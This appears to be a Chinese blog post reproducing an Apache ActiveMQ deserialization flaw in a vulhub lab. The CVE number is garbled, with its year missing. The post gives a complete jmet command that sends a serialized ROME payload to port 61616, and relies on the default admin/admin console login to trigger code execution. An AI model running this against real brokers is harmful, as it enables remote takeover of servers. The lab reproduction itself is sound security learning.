失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > vulhub漏洞复现- ActiveMQ 反序列化漏洞(CVE--5254)

vulhub漏洞复现- ActiveMQ 反序列化漏洞(CVE--5254)

时间:2022-09-04 04:30:42

相关推荐

vulhub漏洞复现- ActiveMQ 反序列化漏洞(CVE--5254)

概要

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

利用过程

构造(可以使用ysoserial)可执行命令的序列化对象作为一个消息,发送给目标61616端口访问web管理页面(8161端口),读取消息,触发漏洞

复现

使用jmet构造反序列化对象

payload

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 服务器IP 61616

进入管理者页面(弱口令admin/admin)

触发消息

ls /tmp/

成功

如果觉得《vulhub漏洞复现- ActiveMQ 反序列化漏洞(CVE--5254)》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。